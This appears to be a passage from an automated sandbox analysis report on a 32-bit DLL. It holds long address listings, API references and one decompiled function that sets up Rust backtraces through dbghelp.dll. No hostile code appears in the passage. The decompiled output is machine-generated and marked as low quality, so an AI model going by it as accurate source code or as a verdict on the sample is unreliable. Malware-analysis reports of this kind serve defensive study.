                                                                                                                                                                                      0x6e9dd3e0
                                                                                                                                                                                      0x6e9dd3e0
                                                                                                                                                                                      0x6e9dd3e6
                                                                                                                                                                                      0x6e9dd3eb
                                                                                                                                                                                      0x6e9dd3ed
                                                                                                                                                                                      0x6e9dd3f2
                                                                                                                                                                                      0x6e9dd3f8
                                                                                                                                                                                      0x6e9dd402
                                                                                                                                                                                      0x6e9dd40c
                                                                                                                                                                                      0x6e9dd43d
                                                                                                                                                                                      0x6e9dd440
                                                                                                                                                                                      0x6e9dd443
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd445
                                                                                                                                                                                      0x6e9dd44c
                                                                                                                                                                                      0x6e9dd454
                                                                                                                                                                                      0x6e9dd42f
                                                                                                                                                                                      0x6e9dd42f
                                                                                                                                                                                      0x6e9dd432
                                                                                                                                                                                      0x6e9dd436
                                                                                                                                                                                      0x6e9dd437
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd456
                                                                                                                                                                                      0x6e9dd48a
                                                                                                                                                                                      0x6e9dd494
                                                                                                                                                                                      0x6e9dd497
                                                                                                                                                                                      0x6e9dd49e
                                                                                                                                                                                      0x6e9dd4a9
                                                                                                                                                                                      0x6e9dd4b2
                                                                                                                                                                                      0x6e9dd4ba
                                                                                                                                                                                      0x6e9dd4bd
                                                                                                                                                                                      0x6e9dd4c1
                                                                                                                                                                                      0x6e9dd4c6
                                                                                                                                                                                      0x6e9dd420
                                                                                                                                                                                      0x6e9dd426
                                                                                                                                                                                      0x6e9dd429
                                                                                                                                                                                      0x6e9dd42c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd42c
                                                                                                                                                                                      0x6e9dd460
                                                                                                                                                                                      0x6e9dd466
                                                                                                                                                                                      0x6e9dd468
                                                                                                                                                                                      0x6e9dd46e
                                                                                                                                                                                      0x6e9dd471
                                                                                                                                                                                      0x6e9dd474
                                                                                                                                                                                      0x6e9dd477
                                                                                                                                                                                      0x6e9dd479
                                                                                                                                                                                      0x6e9dd4d1
                                                                                                                                                                                      0x6e9dd4da
                                                                                                                                                                                      0x6e9dd4dc
                                                                                                                                                                                      0x6e9dd503
                                                                                                                                                                                      0x6e9dd50b
                                                                                                                                                                                      0x6e9dd50e
                                                                                                                                                                                      0x6e9dd513
                                                                                                                                                                                      0x6e9dd516
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd518
                                                                                                                                                                                      0x6e9dd518
                                                                                                                                                                                      0x6e9dd51c
                                                                                                                                                                                      0x6e9dd522
                                                                                                                                                                                      0x6e9dd524
                                                                                                                                                                                      0x6e9dd52a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd530
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd530
                                                                                                                                                                                      0x6e9dd52a
                                                                                                                                                                                      0x6e9dd4de
                                                                                                                                                                                      0x6e9dd4de
                                                                                                                                                                                      0x6e9dd4e2
                                                                                                                                                                                      0x6e9dd4e5
                                                                                                                                                                                      0x6e9dd4e8
                                                                                                                                                                                      0x6e9dd4eb
                                                                                                                                                                                      0x6e9dd53b
                                                                                                                                                                                      0x6e9dd53d
                                                                                                                                                                                      0x6e9dd543
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd4ed
                                                                                                                                                                                      0x6e9dd4f3
                                                                                                                                                                                      0x6e9dd4f5
                                                                                                                                                                                      0x6e9dd565
                                                                                                                                                                                      0x6e9dd565
                                                                                                                                                                                      0x6e9dd567
                                                                                                                                                                                      0x6e9dd4f7
                                                                                                                                                                                      0x6e9dd4fb
                                                                                                                                                                                      0x6e9dd4fe
                                                                                                                                                                                      0x6e9dd4fe
                                                                                                                                                                                      0x6e9dd56a
                                                                                                                                                                                      0x6e9dd56d
                                                                                                                                                                                      0x6e9dd56f
                                                                                                                                                                                      0x6e9dd572
                                                                                                                                                                                      0x6e9dd595
                                                                                                                                                                                      0x6e9dd597
                                                                                                                                                                                      0x6e9dd59a
                                                                                                                                                                                      0x6e9dd5a0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd5a2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd5a2
                                                                                                                                                                                      0x6e9dd574
                                                                                                                                                                                      0x6e9dd574
                                                                                                                                                                                      0x6e9dd57d
                                                                                                                                                                                      0x6e9dd57f
                                                                                                                                                                                      0x6e9dd5aa
                                                                                                                                                                                      0x6e9dd5aa
                                                                                                                                                                                      0x6e9dd5ac
                                                                                                                                                                                      0x6e9dd581
                                                                                                                                                                                      0x6e9dd587
                                                                                                                                                                                      0x6e9dd58a
                                                                                                                                                                                      0x6e9dd58a
                                                                                                                                                                                      0x6e9dd5bf
                                                                                                                                                                                      0x6e9dd5c1
                                                                                                                                                                                      0x6e9dd5c4
                                                                                                                                                                                      0x6e9dd5ca
                                                                                                                                                                                      0x6e9dd549
                                                                                                                                                                                      0x6e9dd549
                                                                                                                                                                                      0x6e9dd54c
                                                                                                                                                                                      0x6e9dd54e
                                                                                                                                                                                      0x6e9dd554
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd55a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd55a
                                                                                                                                                                                      0x6e9dd5d0
                                                                                                                                                                                      0x6e9dd5d0
                                                                                                                                                                                      0x6e9dd5d0
                                                                                                                                                                                      0x6e9dd5d6
                                                                                                                                                                                      0x6e9dd5f0
                                                                                                                                                                                      0x6e9dd5f3
                                                                                                                                                                                      0x6e9dd5f6
                                                                                                                                                                                      0x6e9dd5f8
                                                                                                                                                                                      0x6e9dd5fb
                                                                                                                                                                                      0x6e9dd601
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd607
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd607
                                                                                                                                                                                      0x6e9dd601
                                                                                                                                                                                      0x6e9dd5ca
                                                                                                                                                                                      0x6e9dd572
                                                                                                                                                                                      0x6e9dd4eb
                                                                                                                                                                                      0x6e9dd47b
                                                                                                                                                                                      0x6e9dd47b
                                                                                                                                                                                      0x6e9dd47d
                                                                                                                                                                                      0x6e9dd480
                                                                                                                                                                                      0x6e9dd482
                                                                                                                                                                                      0x6e9dd488
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd488
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd479
                                                                                                                                                                                      0x6e9dd60c
                                                                                                                                                                                      0x6e9dd612
                                                                                                                                                                                      0x6e9dd61a
                                                                                                                                                                                      0x6e9dd61d
                                                                                                                                                                                      0x6e9dd622
                                                                                                                                                                                      0x6e9dd625
                                                                                                                                                                                      0x6e9dd627
                                                                                                                                                                                      0x6e9dd62a
                                                                                                                                                                                      0x6e9dd62c
                                                                                                                                                                                      0x6e9dd674
                                                                                                                                                                                      0x6e9dd674
                                                                                                                                                                                      0x6e9dd676
                                                                                                                                                                                      0x6e9dd680
                                                                                                                                                                                      0x6e9dd680
                                                                                                                                                                                      0x6e9dd682
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd688
                                                                                                                                                                                      0x6e9dd68b
                                                                                                                                                                                      0x6e9dd68f
                                                                                                                                                                                      0x6e9dd692
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd692
                                                                                                                                                                                      0x6e9dd720
                                                                                                                                                                                      0x6e9dd723
                                                                                                                                                                                      0x6e9dd725
                                                                                                                                                                                      0x6e9dd731
                                                                                                                                                                                      0x6e9dd736
                                                                                                                                                                                      0x6e9dd739
                                                                                                                                                                                      0x6e9dd73c
                                                                                                                                                                                      0x6e9dd73c
                                                                                                                                                                                      0x6e9dd73f
                                                                                                                                                                                      0x6e9dd745
                                                                                                                                                                                      0x6e9dd74a
                                                                                                                                                                                      0x6e9dd74f
                                                                                                                                                                                      0x6e9dd752
                                                                                                                                                                                      0x6e9dd754
                                                                                                                                                                                      0x6e9dd757
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd75d
                                                                                                                                                                                      0x6e9dd760
                                                                                                                                                                                      0x6e9dd771
                                                                                                                                                                                      0x6e9dd776
                                                                                                                                                                                      0x6e9dd779
                                                                                                                                                                                      0x6e9dd77e
                                                                                                                                                                                      0x6e9dd783
                                                                                                                                                                                      0x6e9dd785
                                                                                                                                                                                      0x6e9dd788
                                                                                                                                                                                      0x6e9dd78f
                                                                                                                                                                                      0x6e9dd792
                                                                                                                                                                                      0x6e9dd799
                                                                                                                                                                                      0x6e9dd79f
                                                                                                                                                                                      0x6e9dd7c2
                                                                                                                                                                                      0x6e9dd7c7
                                                                                                                                                                                      0x6e9dd7cb
                                                                                                                                                                                      0x6e9dd7cd
                                                                                                                                                                                      0x6e9dd7cf
                                                                                                                                                                                      0x6e9dd7d2
                                                                                                                                                                                      0x6e9dd7df
                                                                                                                                                                                      0x6e9dd7e4
                                                                                                                                                                                      0x6e9dd7ea
                                                                                                                                                                                      0x6e9dd7ed
                                                                                                                                                                                      0x6e9dd7ed
                                                                                                                                                                                      0x6e9dd7f0
                                                                                                                                                                                      0x6e9dd7f3
                                                                                                                                                                                      0x6e9dd7f5
                                                                                                                                                                                      0x6e9dd7f8
                                                                                                                                                                                      0x6e9dd7a1
                                                                                                                                                                                      0x6e9dd800
                                                                                                                                                                                      0x6e9dd800
                                                                                                                                                                                      0x6e9dd806
                                                                                                                                                                                      0x6e9dd806
                                                                                                                                                                                      0x6e9dd80d
                                                                                                                                                                                      0x6e9dd80d
                                                                                                                                                                                      0x6e9dd812
                                                                                                                                                                                      0x6e9dd81d
                                                                                                                                                                                      0x6e9dd823
                                                                                                                                                                                      0x6e9dd825
                                                                                                                                                                                      0x6e9dd827
                                                                                                                                                                                      0x6e9dd833
                                                                                                                                                                                      0x6e9dd833
                                                                                                                                                                                      0x6e9dd835
                                                                                                                                                                                      0x6e9dd7b0
                                                                                                                                                                                      0x6e9dd7b0
                                                                                                                                                                                      0x6e9dd7b2
                                                                                                                                                                                      0x6e9dd7b4
                                                                                                                                                                                      0x6e9dd876
                                                                                                                                                                                      0x6e9dd879
                                                                                                                                                                                      0x6e9dd880
                                                                                                                                                                                      0x6e9dd882
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd888
                                                                                                                                                                                      0x6e9dd88e
                                                                                                                                                                                      0x6e9dd88f
                                                                                                                                                                                      0x6e9dd894
                                                                                                                                                                                      0x6e9dd897
                                                                                                                                                                                      0x6e9dd89a
                                                                                                                                                                                      0x6e9dd89d
                                                                                                                                                                                      0x6e9dd8a0
                                                                                                                                                                                      0x6e9dd8a2
                                                                                                                                                                                      0x6e9dd8a5
                                                                                                                                                                                      0x6e9dd8a7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd8a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd8a7
                                                                                                                                                                                      0x6e9dd7ba
                                                                                                                                                                                      0x6e9dd7ba
                                                                                                                                                                                      0x6e9dd7c0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd7c0
                                                                                                                                                                                      0x6e9dd83b
                                                                                                                                                                                      0x6e9dd83b
                                                                                                                                                                                      0x6e9dd841
                                                                                                                                                                                      0x6e9dd844
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd84a
                                                                                                                                                                                      0x6e9dd84a
                                                                                                                                                                                      0x6e9dd84c
                                                                                                                                                                                      0x6e9dd852
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd854
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd854
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd852
                                                                                                                                                                                      0x6e9dd844
                                                                                                                                                                                      0x6e9dd829
                                                                                                                                                                                      0x6e9dd829
                                                                                                                                                                                      0x6e9dd82f
                                                                                                                                                                                      0x6e9dd831
                                                                                                                                                                                      0x6e9dd8ab
                                                                                                                                                                                      0x6e9dd8ad
                                                                                                                                                                                      0x6e9dd8b3
                                                                                                                                                                                      0x6e9dd8b5
                                                                                                                                                                                      0x6e9dd8b7
                                                                                                                                                                                      0x6e9dd8ba
                                                                                                                                                                                      0x6e9dd8bc
                                                                                                                                                                                      0x6e9dd8be
                                                                                                                                                                                      0x6e9dd8be
                                                                                                                                                                                      0x6e9dd8c2
                                                                                                                                                                                      0x6e9dd8c4
                                                                                                                                                                                      0x6e9dd8c9
                                                                                                                                                                                      0x6e9dd8d6
                                                                                                                                                                                      0x6e9dd8d9
                                                                                                                                                                                      0x6e9dd8de
                                                                                                                                                                                      0x6e9dd8de
                                                                                                                                                                                      0x6e9dd8c9
                                                                                                                                                                                      0x6e9dd8c2
                                                                                                                                                                                      0x6e9dd8e1
                                                                                                                                                                                      0x6e9dd8e1
                                                                                                                                                                                      0x6e9dd8e3
                                                                                                                                                                                      0x6e9dd93d
                                                                                                                                                                                      0x6e9dd940
                                                                                                                                                                                      0x6e9dd942
                                                                                                                                                                                      0x6e9dd945
                                                                                                                                                                                      0x6e9dd8e5
                                                                                                                                                                                      0x6e9dd8e8
                                                                                                                                                                                      0x6e9dd8eb
                                                                                                                                                                                      0x6e9dd8f1
                                                                                                                                                                                      0x6e9dd8f8
                                                                                                                                                                                      0x6e9dd900
                                                                                                                                                                                      0x6e9dd903
                                                                                                                                                                                      0x6e9dd905
                                                                                                                                                                                      0x6e9dd908
                                                                                                                                                                                      0x6e9dd90b
                                                                                                                                                                                      0x6e9dd90e
                                                                                                                                                                                      0x6e9dd912
                                                                                                                                                                                      0x6e9dd914
                                                                                                                                                                                      0x6e9dd916
                                                                                                                                                                                      0x6e9dd91a
                                                                                                                                                                                      0x6e9dd91c
                                                                                                                                                                                      0x6e9dd91c
                                                                                                                                                                                      0x6e9dd928
                                                                                                                                                                                      0x6e9dd928
                                                                                                                                                                                      0x6e9dd936
                                                                                                                                                                                      0x6e9dd936
                                                                                                                                                                                      0x6e9dd8f1
                                                                                                                                                                                      0x6e9dd948
                                                                                                                                                                                      0x6e9dd94f
                                                                                                                                                                                      0x6e9dd960
                                                                                                                                                                                      0x6e9dd960
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd831
                                                                                                                                                                                      0x6e9dd827
                                                                                                                                                                                      0x6e9dd62e
                                                                                                                                                                                      0x6e9dd62e
                                                                                                                                                                                      0x6e9dd630
                                                                                                                                                                                      0x6e9dd632
                                                                                                                                                                                      0x6e9dd632
                                                                                                                                                                                      0x6e9dd636
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd638
                                                                                                                                                                                      0x6e9dd63d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd63f
                                                                                                                                                                                      0x6e9dd63f
                                                                                                                                                                                      0x6e9dd644
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd646
                                                                                                                                                                                      0x6e9dd646
                                                                                                                                                                                      0x6e9dd64b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd64d
                                                                                                                                                                                      0x6e9dd64d
                                                                                                                                                                                      0x6e9dd652
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd654
                                                                                                                                                                                      0x6e9dd654
                                                                                                                                                                                      0x6e9dd659
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd65b
                                                                                                                                                                                      0x6e9dd65b
                                                                                                                                                                                      0x6e9dd660
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd662
                                                                                                                                                                                      0x6e9dd662
                                                                                                                                                                                      0x6e9dd667
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd669
                                                                                                                                                                                      0x6e9dd669
                                                                                                                                                                                      0x6e9dd66c
                                                                                                                                                                                      0x6e9dd66f
                                                                                                                                                                                      0x6e9dd672
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd672
                                                                                                                                                                                      0x6e9dd667
                                                                                                                                                                                      0x6e9dd660
                                                                                                                                                                                      0x6e9dd659
                                                                                                                                                                                      0x6e9dd652
                                                                                                                                                                                      0x6e9dd64b
                                                                                                                                                                                      0x6e9dd644
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd63d
                                                                                                                                                                                      0x6e9dd694
                                                                                                                                                                                      0x6e9dd694
                                                                                                                                                                                      0x6e9dd697
                                                                                                                                                                                      0x6e9dd69e
                                                                                                                                                                                      0x6e9dd6a5
                                                                                                                                                                                      0x6e9dd6a7
                                                                                                                                                                                      0x6e9dd6a9
                                                                                                                                                                                      0x6e9dd6ab
                                                                                                                                                                                      0x6e9dd6ad
                                                                                                                                                                                      0x6e9dd6b3
                                                                                                                                                                                      0x6e9dd6be
                                                                                                                                                                                      0x6e9dd6be
                                                                                                                                                                                      0x6e9dd6b3
                                                                                                                                                                                      0x6e9dd6ab
                                                                                                                                                                                      0x6e9dd6c3
                                                                                                                                                                                      0x6e9dd6c7
                                                                                                                                                                                      0x6e9dd6cd
                                                                                                                                                                                      0x6e9dd6d2
                                                                                                                                                                                      0x6e9dd6d5
                                                                                                                                                                                      0x6e9dd6d8
                                                                                                                                                                                      0x6e9dd6e0
                                                                                                                                                                                      0x6e9dd6e2
                                                                                                                                                                                      0x6e9dd6e5
                                                                                                                                                                                      0x6e9dd6e8
                                                                                                                                                                                      0x6e9dd6eb
                                                                                                                                                                                      0x6e9dd6ef
                                                                                                                                                                                      0x6e9dd6f1
                                                                                                                                                                                      0x6e9dd6f3
                                                                                                                                                                                      0x6e9dd6f7
                                                                                                                                                                                      0x6e9dd6f9
                                                                                                                                                                                      0x6e9dd6f9
                                                                                                                                                                                      0x6e9dd705
                                                                                                                                                                                      0x6e9dd70a
                                                                                                                                                                                      0x6e9dd70a
                                                                                                                                                                                      0x6e9dd716
                                                                                                                                                                                      0x6e9dd716
                                                                                                                                                                                      0x6e9dd859
                                                                                                                                                                                      0x6e9dd85c
                                                                                                                                                                                      0x6e9dd862
                                                                                                                                                                                      0x6e9dd862
                                                                                                                                                                                      0x6e9dd865
                                                                                                                                                                                      0x6e9dd875
                                                                                                                                                                                      0x6e9dd875
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd62c
                                                                                                                                                                                      0x6e9dd43d
                                                                                                                                                                                      0x6e9dd3bc
                                                                                                                                                                                      0x6e9dd3bc
                                                                                                                                                                                      0x6e9dd3c3
                                                                                                                                                                                      0x6e9dd96a
                                                                                                                                                                                      0x6e9dd96f
                                                                                                                                                                                      0x6e9dd974
                                                                                                                                                                                      0x6e9dd979
                                                                                                                                                                                      0x6e9dd97b
                                                                                                                                                                                      0x6e9dd982
                                                                                                                                                                                      0x6e9dd98a
                                                                                                                                                                                      0x6e9dd994
                                                                                                                                                                                      0x6e9dd99f
                                                                                                                                                                                      0x6e9dd9af
                                                                                                                                                                                      0x6e9dd3c9
                                                                                                                                                                                      0x6e9dd3c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd3c9
                                                                                                                                                                                      0x6e9dd3c3
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DD3BC
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00720000,00000000,0000000A), ref: 6E9DD3D3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                                                                                      • String ID: RUST_BACKTRACE
                                                                                                                                                                                      • API String ID: 1617791916-3454309823
                                                                                                                                                                                      • Opcode ID: d68a0f4c6b295554f33a8ca33829b98d1cfad231b125650c321f0f3822e694cf
                                                                                                                                                                                      • Instruction ID: ad586900c9ecc80b8d89ffd6a6b117459378df383075dd083c0b875fa8e8f131
                                                                                                                                                                                      • Opcode Fuzzy Hash: d68a0f4c6b295554f33a8ca33829b98d1cfad231b125650c321f0f3822e694cf
                                                                                                                                                                                      • Instruction Fuzzy Hash: B302CEB1E00A298BDB11CFD8C8907EDBBB5EF49314F148269D519BB380D771A889CF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                                                                      			E6E9DE4E0(void* __ebx, void* __edi, void* __esi, char _a8) {
                                                                                                                                                                                      				int _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                      				struct HINSTANCE__* _t20;
                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                      				_Unknown_base(*)()* _t25;
                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                      				_Unknown_base(*)()* _t30;
                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                      				_Unknown_base(*)()* _t38;
                                                                                                                                                                                      				_Unknown_base(*)()* _t39;
                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                      				_Unknown_base(*)()* _t52;
                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t48 = __edi;
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_v32 = _t59 - 0x14;
                                                                                                                                                                                      				_v20 = 0xffffffff;
                                                                                                                                                                                      				_v24 = E6E9E39F0;
                                                                                                                                                                                      				_v28 =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] =  &_v28;
                                                                                                                                                                                      				_t35 =  *0x6ea2e124; // 0x0
                                                                                                                                                                                      				if(_t35 == 0) {
                                                                                                                                                                                      					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
                                                                                                                                                                                      					__eflags = _t15;
                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                      						_t54 = 1;
                                                                                                                                                                                      						goto L19;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t35 = _t15;
                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                      						asm("lock cmpxchg [0x6ea2e124], ebx");
                                                                                                                                                                                      						if(0 != 0) {
                                                                                                                                                                                      							CloseHandle(_t35);
                                                                                                                                                                                      							_t35 = 0;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
                                                                                                                                                                                      					_t20 =  *0x6ea2e130; // 0x0
                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                      						L3:
                                                                                                                                                                                      						_t54 = 0;
                                                                                                                                                                                      						if( *0x6ea2e164 != 0) {
                                                                                                                                                                                      							goto L19;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t38 =  *0x6ea2e134; // 0x0
                                                                                                                                                                                      							if(_t38 != 0) {
                                                                                                                                                                                      								L7:
                                                                                                                                                                                      								_t21 =  *_t38();
                                                                                                                                                                                      								_t39 =  *0x6ea2e138; // 0x0
                                                                                                                                                                                      								_t50 = _t21;
                                                                                                                                                                                      								if(_t39 != 0) {
                                                                                                                                                                                      									L10:
                                                                                                                                                                                      									 *_t39(_t50 | 0x00000004);
                                                                                                                                                                                      									_t52 =  *0x6ea2e13c; // 0x0
                                                                                                                                                                                      									if(_t52 != 0) {
                                                                                                                                                                                      										L13:
                                                                                                                                                                                      										_t23 = GetCurrentProcess();
                                                                                                                                                                                      										 *_t52(_t23, 0, 1);
                                                                                                                                                                                      										 *0x6ea2e164 = 1;
                                                                                                                                                                                      										goto L19;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t25 = GetProcAddress( *0x6ea2e130, "SymInitializeW");
                                                                                                                                                                                      										if(_t25 == 0) {
                                                                                                                                                                                      											_v36 = _t35;
                                                                                                                                                                                      											_v20 = 0;
                                                                                                                                                                                      											E6E9F94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ea204bc);
                                                                                                                                                                                      											goto L23;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t52 = _t25;
                                                                                                                                                                                      											 *0x6ea2e13c = _t25;
                                                                                                                                                                                      											goto L13;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t28 = GetProcAddress( *0x6ea2e130, "SymSetOptions");
                                                                                                                                                                                      									if(_t28 == 0) {
                                                                                                                                                                                      										_v36 = _t35;
                                                                                                                                                                                      										_v20 = 0;
                                                                                                                                                                                      										E6E9F94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ea204ac);
                                                                                                                                                                                      										goto L23;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t39 = _t28;
                                                                                                                                                                                      										 *0x6ea2e138 = _t28;
                                                                                                                                                                                      										goto L10;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t30 = GetProcAddress(_t20, "SymGetOptions");
                                                                                                                                                                                      								if(_t30 == 0) {
                                                                                                                                                                                      									_v36 = _t35;
                                                                                                                                                                                      									_v20 = 0;
                                                                                                                                                                                      									E6E9F94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ea2049c);
                                                                                                                                                                                      									L23:
                                                                                                                                                                                      									asm("ud2");
                                                                                                                                                                                      									__eflags =  &_a8;
                                                                                                                                                                                      									return E6E9DE6D0(_v36);
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t38 = _t30;
                                                                                                                                                                                      									 *0x6ea2e134 = _t30;
                                                                                                                                                                                      									goto L7;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t20 = LoadLibraryA("dbghelp.dll");
                                                                                                                                                                                      						 *0x6ea2e130 = _t20;
                                                                                                                                                                                      						if(_t20 == 0) {
                                                                                                                                                                                      							ReleaseMutex(_t35);
                                                                                                                                                                                      							_t54 = 1;
                                                                                                                                                                                      							L19:
                                                                                                                                                                                      							 *[fs:0x0] = _v28;
                                                                                                                                                                                      							return _t54;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}






















                                                                                                                                                                                      0x6e9de4e0
                                                                                                                                                                                      0x6e9de4e4
                                                                                                                                                                                      0x6e9de4e9
                                                                                                                                                                                      0x6e9de4ec
                                                                                                                                                                                      0x6e9de4f3
                                                                                                                                                                                      0x6e9de504
                                                                                                                                                                                      0x6e9de507
                                                                                                                                                                                      0x6e9de50d
                                                                                                                                                                                      0x6e9de515
                                                                                                                                                                                      0x6e9de5f5
                                                                                                                                                                                      0x6e9de5fa
                                                                                                                                                                                      0x6e9de5fc
                                                                                                                                                                                      0x6e9de620
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de5fe
                                                                                                                                                                                      0x6e9de5fe
                                                                                                                                                                                      0x6e9de600
                                                                                                                                                                                      0x6e9de602
                                                                                                                                                                                      0x6e9de60a
                                                                                                                                                                                      0x6e9de613
                                                                                                                                                                                      0x6e9de619
                                                                                                                                                                                      0x6e9de619
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de60a
                                                                                                                                                                                      0x6e9de51b
                                                                                                                                                                                      0x6e9de51b
                                                                                                                                                                                      0x6e9de520
                                                                                                                                                                                      0x6e9de525
                                                                                                                                                                                      0x6e9de52c
                                                                                                                                                                                      0x6e9de545
                                                                                                                                                                                      0x6e9de545
